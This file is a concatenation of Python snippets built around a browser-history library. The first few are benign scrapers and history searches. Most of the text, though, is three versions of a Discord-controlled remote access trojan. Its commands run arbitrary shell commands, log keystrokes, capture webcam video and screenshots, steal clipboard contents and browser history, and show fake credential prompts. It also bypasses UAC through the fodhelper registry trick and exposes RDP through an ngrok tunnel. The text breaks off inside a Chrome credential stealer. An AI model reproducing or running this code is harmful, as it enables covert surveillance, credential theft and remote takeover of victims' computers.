def main(): cur_show = sys.argv[1] NUM_SEARCH = 1000 #look through last x history entries show_data = Show_data(cur_show) if show_data.verify_show() == False: print("Bad show...") exit(1) history_dict = bh.get_browserhistory() safari_history_list = history_dict[ 'safari'] #Make usable for other browswers too next_url = None for search_idx in range(NUM_SEARCH): entry = safari_history_list[search_idx] entry_url = entry[1] if entry_url != None and is_correct_entry(entry, show_data) == True: next_url = get_next_url(entry, show_data) print(next_url) exit(0) print(f"Episodes not found in history. Searched {NUM_SEARCH} entries") exit(1)
def search_url(self, text): self.bh_history = bh.get_browserhistory() count = 0 for browser in self.bh_history.keys(): history = self.bh_history[browser] for entry in history: (url, title, datetime) = entry if url == text: count += 1 return count
def BrowserCheck(var, BrowserList): history = bh.get_browserhistory() history = history.get(BrowserList[var.get()]) for i in range(len(history)): UrlIP = (history[i][0]) r = requests.get(UrlIP) IPaddress = r.raw._original_response.peer IPaddress = str(IPaddress).replace("(", "").replace(")", "").replace("'", "") result = (UrlIP + " ---- " + IPaddress) UrlText.insert(INSERT, "\n"+result) print(result)
def inputBrowser(): if platform == "linux" or platform == "darwin" or platform == "linux2": os.system('killall -KILL firefox') else: os.system('taskkill /F /IM firefox.exe') a = get_browserhistory() # # browse() # os.system('taskkill /F /IM firefox.exe') # os.system('killall -KILL firefox') print("We have your browser history HUAHUAHUA!") return a
def search_domain(self, text): self.bh_history = bh.get_browserhistory() count = 0 for browser in self.bh_history.keys(): history = self.bh_history[browser] for entry in history: (url, title, datetime) = entry ext = tldextract.extract(url) #join domain and tld if ext.registered_domain == text: count += 1 return count
def get_genius_lookups() -> list: """ Search browser history for hits to Genius.com. Isolate lyric lookups. Return a list of links to lyrics. """ # get dictionary with full browser history dict_obj = bh.get_browserhistory() links = [] # isolate chrome history and find searches for lyrics on genius.com # will add same functionality for other browsers soon for value in dict_obj['chrome']: if 'genius.com' in value[0] and value[0][-6:] == 'lyrics': links.append(value[0]) return links
def getBrowserHistory(): dict_obj = bh.get_browserhistory() dict_obj.keys() l = dict_obj['chrome'][:10:] res = [] for l1 in l: res.append(l1[0]) chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--headless") driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=chrome_options) products = [] prices = [] rams = [] roms = [] for w1 in res: if len(products) > 3: break if 'flipkart' not in w1: continue driver.get(w1) content = driver.page_source soup = BeautifulSoup(content) for a in soup.findAll('a', href=True, attrs={'class': '_31qSD5'}): name = a.find('div', attrs={'class': '_3wU53n'}) price = a.find('div', attrs={'class': '_1vC4OE _2rQ-NK'}) #rating=a.find('div', attrs={'class':'hGSR34 _2beYZw'}) pr = price.text if pr[4:].isdigit() and pr[1:3].isdigit(): p = int(pr[4:]) p += int(pr[1:3]) * 1000 p = p // 80 else: break a1 = name.text i = -1 j = -1 jl = '' if 'GB' in a1: i = a1.index('GB') if 'HDD' in a1: j = a1.index('HDD') jl = 'HDD' if 'TB' in a1: j = a1.index('TB') jl = 'TB' if 'SSD' in a1: j = a1.index('SSD') jl = 'SSD' if i != -1 and j != -1: ram = a1[i - 3:i - 1] if (ram[0] == '('): ram = int(ram[1::]) else: ram = int(ram) if jl == 'TB': rams.append(ram) roms.append(a1[j - 2:j + 6]) products.append(name.text) prices.append(p) elif jl == 'HDD': rams.append(ram) roms.append(a1[j - 7:j + 3]) products.append(name.text) prices.append(p) elif jl == 'SSD': rams.append(ram) roms.append(a1[j - 7:j + 3]) products.append(name.text) prices.append(p) if len(prices) == 0: #for h1 in soup.findAll('h1',attrs={'class':'_9E25nV'}): name = soup.find('span', attrs={'class': '_35KyD6'}) price = soup.find('div', attrs={'class': '_1vC4OE _3qQ9m1'}) a1 = name.text pr = price.text print(pr, name.text) if pr[4:].isdigit() and pr[1:3].isdigit(): p = int(pr[4:]) p += int(pr[1:3]) * 1000 p = p // 80 else: break i = -1 j = -1 jl = '' if 'GB' in a1: i = a1.index('GB') if 'HDD' in a1: j = a1.index('HDD') jl = 'HDD' if 'TB' in a1: j = a1.index('TB') jl = 'TB' if 'SSD' in a1: j = a1.index('SSD') jl = 'SSD' if i != -1 and j != -1: ram = a1[i - 3:i - 1] if (ram[0] == '('): ram = int(ram[1::]) else: ram = int(ram) if jl == 'TB': rams.append(ram) roms.append(a1[j - 2:j + 6]) products.append(name.text) prices.append(p) elif jl == 'HDD': rams.append(ram) roms.append(a1[j - 7:j + 3]) products.append(name.text) prices.append(p) elif jl == 'SSD': rams.append(ram) roms.append(a1[j - 7:j + 3]) products.append(name.text) prices.append(p) df = pd.DataFrame({ 'Product Name': products, 'Price': prices, 'RAM': rams, 'Storage': roms }) result = df.to_json(orient='index') return result
async def on_message(message): if message.content == '!webcampic': import cv2 cam = cv2.VideoCapture(0) retval, frame = cam.read() cam.release() cv2.imwrite('filename.jpg', frame) cam.release() file = discord.File("filename.jpg", filename="filename.jpg") await message.channel.send("[*] Command successfuly executed", file=file) if message.content == "!volumemax": volumeup() elif message.content == "!startkeylogger": import base64 import os decoded_string = base64.b64decode(bytes(keyrec)) with open("test.ps1", "wb") as image_file2: image_file2.write(decoded_string); os.popen("powershell.exe ./test.ps1") await message.channel.send("[*] Command successfuly executed") elif message.content == "!stopkeylogger": import os os.popen("taskkill /F /IM powershell.exe") await message.channel.send("[*] Command successfuly executed") elif message.content == "!dumpkeylogger": import os temp = os.getenv("TEMP") file_keys = temp + "//test_keylogger.txt" file = discord.File(file_keys, filename=file_keys) await message.channel.send("[*] Command successfuly executed", file=file) elif message.content == "!exit": import sys sys.exit() elif message.content == "!screenshot": from mss import mss with mss() as sct: sct.shot() file = discord.File("monitor-1.png", filename="monitor-1.png") await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith("!message"): import ctypes MB_YESNO = 0x04 MB_HELP = 0x4000 ICON_STOP = 0x10 result = ctypes.windll.user32.MessageBoxW(0, message.content[8:], "Error", MB_HELP| MB_YESNO | ICON_STOP) if message.content.startswith('!webcamvid'): import numpy as np import os import subprocess import cv2 import time capture_duration = int(message.content[11:]) cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480)) start_time = time.time() while( int(time.time() - start_time) < capture_duration ): ret, frame = cap.read() if ret==True: out.write(frame) else: break cap.release() out.release() cv2.destroyAllWindows() file = discord.File("output.avi", filename="output.avi") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del output.avi") if message.content.startswith("!wallpaper"): import ctypes print(message.content[11:]) image = '"' + message.content[11:] + '"' ctypes.windll.user32.SystemParametersInfoW(20, 0, message.content[11:] , 0) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!upload"): import re import urllib.request li = message.content[8:] sep = 'name=' nck = li.split(sep, 1)[0] na = re.sub(r'.*=', '=', li) me = re.sub('=', '', na) urllib.request.urlretrieve(nck, me) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!sing"): import os volumeup() os.chdir(appdata) choice = message.content[6:] f1=open('x0.vbs', 'a') f1.write('Set ie = CreateObject("InternetExplorer.Application")'+ "\r\n") f1.write("ie.Visible = 0" + "\r\n") f1.write('ie.Navigate2' + ' ' + '"' + choice + '"') f1.close() os.system('x0.vbs') import time time.sleep(10) os.system("del x0.vbs") if message.content.startswith("!stopsing"): import os os.system("taskkill /F /IM iexplore.exe") os.chdir(appdata) os.system("del x0.vbs") if message.content.startswith("!output"): import subprocess import os instruction = message.content[7:] output = subprocess.run(instruction, stdout=subprocess.PIPE, shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE) result = str(output.stdout.decode('CP437')) numb = len(result) if numb > 1990: f1=open("output.txt",'a') f1.write(result) f1.close() file = discord.File("output.txt", filename="output.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del output.txt") else: await message.channel.send("[*] Command successfuly executed : " + result) if message.content.startswith("!custom"): import os import subprocess os.popen(message.content[8:]) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!voice"): volumeup() import win32com.client as wincl speak = wincl.Dispatch("SAPI.SpVoice") speak.Speak(message.content[6:]) comtypes.CoUninitialize() await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!download"): file = discord.File(message.content[10:], filename=message.content[10:]) await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith("!cd"): import os os.chdir(message.content[4:]) await message.channel.send("[*] Command successfuly executed") if message.content == "!help": await message.channel.send(helpmenu) if message.content.startswith("!write"): import pyautogui if message.content[7:] == "enter": pyautogui.press("enter") else: pyautogui.typewrite(message.content[7:]) if message.content == "!history": import os import browserhistory as bh dict_obj = bh.get_browserhistory() strobj = str(dict_obj).encode(errors='ignore') f3=open('history.txt', 'a') f3.write(str(strobj)) f3.close() file = discord.File("history.txt", filename="history.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del history.txt") if message.content == "!clipboard": import ctypes import os CF_TEXT = 1 kernel32 = ctypes.windll.kernel32 kernel32.GlobalLock.argtypes = [ctypes.c_void_p] kernel32.GlobalLock.restype = ctypes.c_void_p kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p] user32 = ctypes.windll.user32 user32.GetClipboardData.restype = ctypes.c_void_p user32.OpenClipboard(0) if user32.IsClipboardFormatAvailable(CF_TEXT): data = user32.GetClipboardData(CF_TEXT) data_locked = kernel32.GlobalLock(data) text = ctypes.c_char_p(data_locked) value = text.value kernel32.GlobalUnlock(data_locked) body = str(value) user32.CloseClipboard() await message.channel.send("[*] Command successfuly executed : " + "Clipboard content is : " + body) if message.content == "!sysinfo": import platform jak = str(platform.uname()) intro = jak[12:] from requests import get ip = get('https://api.ipify.org').text pp = "IP Adress = " + ip await message.channel.send("[*] Command successfuly executed : " + intro + pp) if message.content == "!geolocate": import urllib.request import json with urllib.request.urlopen("https://geolocation-db.com/json") as url: data = json.loads(url.read().decode()) lol = str(data) lat = lol[112:] sep = ',' restlat = lat.split(sep, 1)[0] longg = lol[134:] restlong = longg.split(sep, 1)[0] link = "http://www.google.com/maps/place/" +restlat +"," + restlong await message.channel.send("[*] Command successfuly executed : " + link) if message.content == "!admincheck": import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: await message.channel.send("[*] Congrats you're admin") elif is_admin == False: await message.channel.send("[*] Sorry, you're not admin")
async def on_message(message): if message.content.startswith("!interact"): global chosen chosen = message.content[10:] if chosen != uuidgen: pass else: if message.content == "!dumpkeylogger": import os temp = os.getenv("TEMP") file_keys = temp + "key_log.txt" file = discord.File(file_keys, filename=file_keys) await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del " + file_keys) elif message.content == "!exit": import sys sys.exit() elif message.content == "!screenshot": from mss import mss with mss() as sct: sct.shot() file = discord.File("monitor-1.png", filename="monitor-1.png") await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith("!message"): import ctypes MB_YESNO = 0x04 MB_HELP = 0x4000 ICON_STOP = 0x10 result = ctypes.windll.user32.MessageBoxW( 0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) if message.content.startswith("!phishcreds"): import os import io import sys import sqlite3 import json import shutil import win32cred import win32crypt import win32api import win32con import pywintypes CRED_TYPE_GENERIC = win32cred.CRED_TYPE_GENERIC CredUIPromptForCredentials = win32cred.CredUIPromptForCredentials creds = [] creds = CredUIPromptForCredentials(os.environ['userdomain'], 0, os.environ['username'], None, True, CRED_TYPE_GENERIC, {}) print(creds) await message.channel.send("[*] Command successfuly executed " + str(creds)) if message.content.startswith("!wallpaper"): import ctypes ctypes.windll.user32.SystemParametersInfoW(20, 0, message.content[11:], 0) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!upload"): import re import urllib.request li = message.content[8:] sep = 'name=' nck = li.split(sep, 1)[0] na = re.sub(r'.*=', '=', li) me = re.sub('=', '', na) urllib.request.urlretrieve(nck, me) await message.channel.send("[*] Command successfuly executed") if message.content == '!webcampic': import cv2 cam = cv2.VideoCapture(0) retval, frame = cam.read() cam.release() cv2.imwrite('filename.jpg', frame) cam.release() file = discord.File("filename.jpg", filename="filename.jpg") await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith('!webcamvid'): import numpy as np import os import subprocess import cv2 import time capture_duration = int(message.content[11:]) cap = cv2.VideoCapture(0) fourcc = cv2.VideoWriter_fourcc(*'XVID') out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640, 480)) start_time = time.time() while (int(time.time() - start_time) < capture_duration): ret, frame = cap.read() if ret == True: out.write(frame) else: break cap.release() out.release() cv2.destroyAllWindows() file = discord.File("output.avi", filename="output.avi") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del output.avi") if message.content.startswith("!output"): import subprocess import os instruction = message.content[8:] output = subprocess.run(instruction, stdout=subprocess.PIPE, shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE) result = str(output.stdout.decode('CP437')) numb = len(result) if numb > 1990: f1 = open("output.txt", 'a') f1.write(result) f1.close() file = discord.File("output.txt", filename="output.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del output.txt") else: await message.channel.send( "[*] Command successfuly executed : " + result) if message.content.startswith("!custom"): import os import subprocess os.popen(message.content[8:]) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!download"): file = discord.File(message.content[10:], filename=message.content[10:]) await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith("!cd"): import os os.chdir(message.content[4:]) await message.channel.send("[*] Command successfuly executed") if message.content == "!help": await message.channel.send(helpmenu) if message.content.startswith("!write"): import pyautogui if message.content[7:] == "enter": pyautogui.press("enter") else: pyautogui.typewrite(message.content[7:]) if message.content == "!history": import os import browserhistory as bh dict_obj = bh.get_browserhistory() strobj = str(dict_obj).encode(errors='ignore') f3 = open('history.txt', 'a') f3.write(str(strobj)) f3.close() file = discord.File("history.txt", filename="history.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del history.txt") if message.content == "!clipboard": import ctypes import os CF_TEXT = 1 kernel32 = ctypes.windll.kernel32 kernel32.GlobalLock.argtypes = [ctypes.c_void_p] kernel32.GlobalLock.restype = ctypes.c_void_p kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p] user32 = ctypes.windll.user32 user32.GetClipboardData.restype = ctypes.c_void_p user32.OpenClipboard(0) if user32.IsClipboardFormatAvailable(CF_TEXT): data = user32.GetClipboardData(CF_TEXT) data_locked = kernel32.GlobalLock(data) text = ctypes.c_char_p(data_locked) value = text.value kernel32.GlobalUnlock(data_locked) body = str(value) user32.CloseClipboard() await message.channel.send( "[*] Command successfuly executed : " + "Clipboard content is : " + body) if message.content.startswith("!stopsing"): import os os.system("taskkill /F /IM iexplore.exe") os.chdir(appdata) os.system("del x0.vbs") if message.content == "!sysinfo": import platform jak = str(platform.uname()) intro = jak[12:] from requests import get ip = get('https://api.ipify.org').text pp = "IP Adress = " + ip await message.channel.send("[*] Command successfuly executed : " + intro + pp) if message.content == "!geolocate": import urllib.request import json with urllib.request.urlopen( "https://geolocation-db.com/json") as url: data = json.loads(url.read().decode()) lol = str(data) lat = lol[112:] sep = ',' restlat = lat.split(sep, 1)[0] longg = lol[134:] restlong = longg.split(sep, 1)[0] link = "http://www.google.com/maps/place/" + restlat + "," + restlong await message.channel.send( "[*] Command successfuly executed : " + link) if message.content == "!admincheck": import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: await message.channel.send("[*] Congrats you're admin") elif is_admin == False: await message.channel.send("[*] Sorry, you're not admin") if message.content == "!uacbypass": import os import win32net if 'logonserver' in os.environ: server = os.environ['logonserver'][2:] else: server = None def if_user_is_admin(Server): groups = win32net.NetUserGetLocalGroups(Server, os.getlogin()) isadmin = False for group in groups: if group.lower().startswith('admin'): isadmin = True return isadmin, groups is_admin, groups = if_user_is_admin(server) # Result handeling if is_admin == True: print('User in admin group trying to bypass uac') import os import sys import ctypes import winreg CMD = "C:\\Windows\\System32\\cmd.exe" FOD_HELPER = 'C:\\Windows\\System32\\fodhelper.exe' COMM = "start" REG_PATH = 'Software\\Classes\\ms-settings\\shell\\open\\command' DELEGATE_EXEC_REG_KEY = 'DelegateExecute' def is_running_as_admin(): ''' Checks if the script is running with administrative privileges. Returns True if is running as admin, False otherwise. ''' try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def create_reg_key(key, value): ''' Creates a reg key ''' try: winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH) registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE) winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value) winreg.CloseKey(registry_key) except WindowsError: raise def bypass_uac(cmd): ''' Tries to bypass the UAC ''' try: create_reg_key(DELEGATE_EXEC_REG_KEY, '') create_reg_key(None, cmd) except WindowsError: raise def execute(): if not is_running_as_admin(): print( '[!] The script is NOT running with administrative privileges' ) print('[+] Trying to bypass the UAC') try: current_dir = os.path.dirname( os.path.realpath( __file__)) + '\\' + "Prototype.exe" cmd = '{} /k {} {}'.format(CMD, COMM, current_dir) print(cmd) bypass_uac(cmd) os.system(FOD_HELPER) sys.exit(0) except WindowsError: sys.exit(1) else: print( '[+] The script is running with administrative privileges!' ) if __name__ == '__main__': execute() else: print("failed") await message.channel.send( "[*] Command failed : User not in administator group") if message.content.startswith("!sing"): import os volumeup() os.chdir(appdata) choice = message.content[6:] f1 = open('x0.vbs', 'a') f1.write('Set ie = CreateObject("InternetExplorer.Application")' + "\r\n") f1.write("ie.Visible = 0" + "\r\n") f1.write('ie.Navigate2' + ' ' + '"' + choice + '"') f1.close() os.system('x0.vbs') import time time.sleep(10) os.system("del x0.vbs") if message.content == "!startkeylogger": import base64 import os from pynput.keyboard import Key, Listener import logging temp = os.getenv("TEMP") log_dir = temp logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') def keylog(): def on_press(key): logging.info(str(key)) with Listener(on_press=on_press) as listener: listener.join() import threading global test test = threading.Thread(target=keylog) test._running = True test.daemon = True test.start() await message.channel.send("[*] Keylogger successfuly started") if message.content == "!stopkeylogger": import os test._running = False await message.channel.send("[*] Keylogger successfuly stopped") if message.content == "!idletime": class LASTINPUTINFO(Structure): _fields_ = [ ('cbSize', c_uint), ('dwTime', c_int), ] def get_idle_duration(): lastInputInfo = LASTINPUTINFO() lastInputInfo.cbSize = sizeof(lastInputInfo) if windll.user32.GetLastInputInfo(byref(lastInputInfo)): millis = windll.kernel32.GetTickCount( ) - lastInputInfo.dwTime return millis / 1000.0 else: return 0 import threading global idle1 idle1 = threading.Thread(target=get_idle_duration) idle1._running = True idle1.daemon = True idle1.start() duration = get_idle_duration() await message.channel.send('User idle for %.2f seconds.' % duration ) import time time.sleep(1) if message.content == "!rdp": import os import ctypes import logging is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == False: body = "you need to be admin for this operation" await message.channel.send("[*] Command failed " + body) else: try: os.popen( 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' ) os.popen( "netsh advfirewall firewall set rule group='remote desktop' new enable=Yes" ) from pyngrok import ngrok public_url = ngrok.connect(3389) rdp = ngrok.connect(3389, "tcp") tunnels = ngrok.get_tunnels() await message.channel.send("[*] Rdp Opened " + str(tunnels)) except: mdr = logging.exception('') await message.channel.send("[*] Command failed " + str(mdr)) if message.content.startswith("!voice"): volumeup() import win32com.client as wincl speak = wincl.Dispatch("SAPI.SpVoice") speak.Speak(message.content[7:]) comtypes.CoUninitialize() await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!blockinput"): import ctypes ok = windll.user32.BlockInput(True) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!unblockinput"): ok = windll.user32.BlockInput(False) await message.channel.send("[*] Command successfuly executed") if message.content == "!stoprdp": import os import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == False: body = "you need to be admin for this operation" await message.channel.send("[*] Command failed " + body) else: os.popen( 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f' ) await message.channel.send("[*] Rdp stopped")
async def on_message(message): if message.content.startswith("!interact"): global chosen chosen = message.content[10:] if chosen != uuidgen: pass else: if message.content == "!dumpkeylogger": import os temp = os.getenv("TEMP") file_keys = temp + "key_log.txt" file = discord.File(file_keys, filename=file_keys) await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del " + file_keys) if message.content == "!exit": import sys sys.exit() if message.content == "!screenshot": import os from mss import mss with mss() as sct: sct.shot( output=os.path.join(os.getenv('TEMP') + "\\monitor.png")) file = discord.File( os.path.join(os.getenv('TEMP') + "\\monitor.png"), filename="monitor.png") await message.channel.send("[*] Command successfuly executed", file=file) os.remove(os.path.join(os.getenv('TEMP') + "\\monitor.png")) if message.content.startswith("!message"): import ctypes MB_YESNO = 0x04 MB_HELP = 0x4000 ICON_STOP = 0x10 result = ctypes.windll.user32.MessageBoxW( 0, message.content[8:], "Error", MB_HELP | MB_YESNO | ICON_STOP) if message.content.startswith("!phishcreds"): import os import io import sys import sqlite3 import json import shutil import win32cred import win32crypt import win32api import win32con import pywintypes CRED_TYPE_GENERIC = win32cred.CRED_TYPE_GENERIC CredUIPromptForCredentials = win32cred.CredUIPromptForCredentials creds = [] creds = CredUIPromptForCredentials(os.environ['userdomain'], 0, os.environ['username'], None, True, CRED_TYPE_GENERIC, {}) print(creds) await message.channel.send("[*] Command successfuly executed " + str(creds)) if message.content.startswith("!wallpaper"): import ctypes ctypes.windll.user32.SystemParametersInfoW(20, 0, message.content[11:], 0) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!upload"): await message.attachments[0].save(message.content[8:]) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!output"): import subprocess import os instruction = message.content[8:] output = subprocess.run(instruction, stdout=subprocess.PIPE, shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE) result = str(output.stdout.decode('CP437')) numb = len(result) if numb > 1990: f1 = open("output.txt", 'a') f1.write(result) f1.close() file = discord.File("output.txt", filename="output.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del output.txt") else: await message.channel.send( "[*] Command successfuly executed : " + result) if message.content.startswith("!custom"): import os import subprocess os.popen(message.content[8:]) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!download"): file = discord.File(message.content[10:], filename=message.content[10:]) await message.channel.send("[*] Command successfuly executed", file=file) if message.content.startswith("!cd"): import os os.chdir(message.content[4:]) await message.channel.send("[*] Command successfuly executed") if message.content == "!help": await message.channel.send(helpmenu) if message.content.startswith("!write"): import pyautogui if message.content[7:] == "enter": pyautogui.press("enter") else: pyautogui.typewrite(message.content[7:]) if message.content == "!history": import os import browserhistory as bh dict_obj = bh.get_browserhistory() strobj = str(dict_obj).encode(errors='ignore') f3 = open('history.txt', 'a') f3.write(str(strobj)) f3.close() file = discord.File("history.txt", filename="history.txt") await message.channel.send("[*] Command successfuly executed", file=file) os.popen("del history.txt") if message.content == "!clipboard": import ctypes import os CF_TEXT = 1 kernel32 = ctypes.windll.kernel32 kernel32.GlobalLock.argtypes = [ctypes.c_void_p] kernel32.GlobalLock.restype = ctypes.c_void_p kernel32.GlobalUnlock.argtypes = [ctypes.c_void_p] user32 = ctypes.windll.user32 user32.GetClipboardData.restype = ctypes.c_void_p user32.OpenClipboard(0) if user32.IsClipboardFormatAvailable(CF_TEXT): data = user32.GetClipboardData(CF_TEXT) data_locked = kernel32.GlobalLock(data) text = ctypes.c_char_p(data_locked) value = text.value kernel32.GlobalUnlock(data_locked) body = str(value) user32.CloseClipboard() await message.channel.send( "[*] Command successfuly executed : " + "Clipboard content is : " + body) if message.content.startswith("!stopsing"): import os os.system("taskkill /F /IM iexplore.exe") os.chdir(appdata) os.system("del x0.vbs") if message.content == "!sysinfo": import platform jak = str(platform.uname()) intro = jak[12:] from requests import get ip = get('https://api.ipify.org').text pp = "IP Adress = " + ip await message.channel.send("[*] Command successfuly executed : " + intro + pp) if message.content == "!geolocate": import urllib.request import json with urllib.request.urlopen( "https://geolocation-db.com/json") as url: data = json.loads(url.read().decode()) lol = str(data) lat = lol[112:] sep = ',' restlat = lat.split(sep, 1)[0] longg = lol[134:] restlong = longg.split(sep, 1)[0] link = "http://www.google.com/maps/place/" + restlat + "," + restlong await message.channel.send( "[*] Command successfuly executed : " + link) if message.content == "!admincheck": import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == True: await message.channel.send("[*] Congrats you're admin") elif is_admin == False: await message.channel.send("[*] Sorry, you're not admin") if message.content == "!uacbypass": import os import win32net if 'logonserver' in os.environ: server = os.environ['logonserver'][2:] else: server = None def if_user_is_admin(Server): groups = win32net.NetUserGetLocalGroups(Server, os.getlogin()) isadmin = False for group in groups: if group.lower().startswith('admin'): isadmin = True return isadmin, groups is_admin, groups = if_user_is_admin(server) # Result handeling if is_admin == True: print('User in admin group trying to bypass uac') import os import sys import ctypes import winreg CMD = "C:\\Windows\\System32\\cmd.exe" FOD_HELPER = 'C:\\Windows\\System32\\fodhelper.exe' COMM = "start" REG_PATH = 'Software\\Classes\\ms-settings\\shell\\open\\command' DELEGATE_EXEC_REG_KEY = 'DelegateExecute' def is_running_as_admin(): ''' Checks if the script is running with administrative privileges. Returns True if is running as admin, False otherwise. ''' try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False def create_reg_key(key, value): ''' Creates a reg key ''' try: winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH) registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE) winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value) winreg.CloseKey(registry_key) except WindowsError: raise def bypass_uac(cmd): ''' Tries to bypass the UAC ''' try: create_reg_key(DELEGATE_EXEC_REG_KEY, '') create_reg_key(None, cmd) except WindowsError: raise def execute(): if not is_running_as_admin(): print( '[!] The script is NOT running with administrative privileges' ) print('[+] Trying to bypass the UAC') try: current_dir = os.path.dirname( os.path.realpath( __file__)) + '\\' + "Prototype.exe" cmd = '{} /k {} {}'.format(CMD, COMM, current_dir) print(cmd) bypass_uac(cmd) os.system(FOD_HELPER) sys.exit(0) except WindowsError: sys.exit(1) else: print( '[+] The script is running with administrative privileges!' ) if __name__ == '__main__': execute() else: print("failed") await message.channel.send( "[*] Command failed : User not in administator group") if message.content.startswith("!sing"): import os volumeup() os.chdir(appdata) choice = message.content[6:] f1 = open('x0.vbs', 'a') f1.write('Set ie = CreateObject("InternetExplorer.Application")' + "\r\n") f1.write("ie.Visible = 0" + "\r\n") f1.write('ie.Navigate2' + ' ' + '"' + choice + '"') f1.close() os.system('x0.vbs') import time time.sleep(10) os.system("del x0.vbs") if message.content == "!startkeylogger": import base64 import os from pynput.keyboard import Key, Listener import logging temp = os.getenv("TEMP") log_dir = temp logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s') def keylog(): def on_press(key): logging.info(str(key)) with Listener(on_press=on_press) as listener: listener.join() import threading global test test = threading.Thread(target=keylog) test._running = True test.daemon = True test.start() await message.channel.send("[*] Keylogger successfuly started") if message.content == "!stopkeylogger": import os test._running = False await message.channel.send("[*] Keylogger successfuly stopped") if message.content == "!idletime": class LASTINPUTINFO(Structure): _fields_ = [ ('cbSize', c_uint), ('dwTime', c_int), ] def get_idle_duration(): lastInputInfo = LASTINPUTINFO() lastInputInfo.cbSize = sizeof(lastInputInfo) if windll.user32.GetLastInputInfo(byref(lastInputInfo)): millis = windll.kernel32.GetTickCount( ) - lastInputInfo.dwTime return millis / 1000.0 else: return 0 import threading global idle1 idle1 = threading.Thread(target=get_idle_duration) idle1._running = True idle1.daemon = True idle1.start() duration = get_idle_duration() await message.channel.send('User idle for %.2f seconds.' % duration ) import time time.sleep(1) if message.content == "!rdp": import os import ctypes import logging is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == False: body = "you need to be admin for this operation" await message.channel.send("[*] Command failed " + body) else: try: os.popen( 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' ) os.popen( "netsh advfirewall firewall set rule group='remote desktop' new enable=Yes" ) from pyngrok import ngrok public_url = ngrok.connect(3389) rdp = ngrok.connect(3389, "tcp") tunnels = ngrok.get_tunnels() await message.channel.send("[*] Rdp Opened " + str(tunnels)) except: mdr = logging.exception('') await message.channel.send("[*] Command failed " + str(mdr)) if message.content.startswith("!voice"): volumeup() import win32com.client as wincl speak = wincl.Dispatch("SAPI.SpVoice") speak.Speak(message.content[7:]) comtypes.CoUninitialize() await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!blockinput"): import ctypes ok = windll.user32.BlockInput(True) await message.channel.send("[*] Command successfuly executed") if message.content.startswith("!unblockinput"): ok = windll.user32.BlockInput(False) await message.channel.send("[*] Command successfuly executed") if message.content == "!stoprdp": import os import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0 if is_admin == False: body = "you need to be admin for this operation" await message.channel.send("[*] Command failed " + body) else: os.popen( 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f' ) await message.channel.send("[*] Rdp stopped") if message.content == "!chrome": import os import sys import shutil import sqlite3 import win32crypt import json, base64 import requests import zipfile from PIL import ImageGrab from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes) APP_DATA_PATH = 